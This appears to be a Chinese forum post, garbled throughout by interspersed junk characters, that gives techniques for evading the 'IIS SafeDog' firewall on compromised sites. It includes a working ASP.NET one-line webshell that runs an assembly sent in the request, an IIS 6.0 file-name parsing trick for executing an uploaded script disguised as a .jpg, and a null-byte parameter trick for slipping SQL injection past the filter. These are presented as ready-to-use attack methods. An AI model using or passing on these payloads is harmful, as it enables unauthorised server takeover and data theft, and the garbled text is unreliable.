1、绕过IIS安全狗的一句话。$ s* A( M: L# w. q
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
0 O# Q, E) n$ o' Z) U/ [4 u<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
" a0 n. u; K! V$ |5 g/ z$ t& t7 j( V2 v4 i* w3 _
2、IIS6.0解析漏洞遇到安全狗。
3 U4 P$ r+ K3 }- U! ~8 r" ]文件名为
: Q. a: U/ D; @4 ]% a$ Whttp://www.xxxxx.com/sh3llc0de.asp;1.jpg9 ^8 M' I1 e* ]* ]9 b; M
+ F& J1 P9 { D8 L6 q/ e* S这样的会被IIS安全狗果断屏蔽。
2 U. ~; g! ]9 v1 u; e) M改成如下名称,IIS6一样会解析:: S6 D ?5 g8 @
www.xxxxx.com/;1.asp;1.jpg' e% ?/ l: n+ L0 C0 m
: U' d9 s; ^3 f3、安全狗的注入绕过。& B W7 d4 d+ U; A
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。; F E$ f2 z( v: Q6 o: s, v7 m* L
但如果:
7 `6 D4 _8 c2 x; W4 a& ur00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
, o7 x0 D- `( O# Z% \9 g! j就可以成功绕过了。
$ I3 t; \! q4 n" W5 j( ~$ {0 s1 s. C& y
7 ?. v' c- O3 I+ z+ U) p' ? |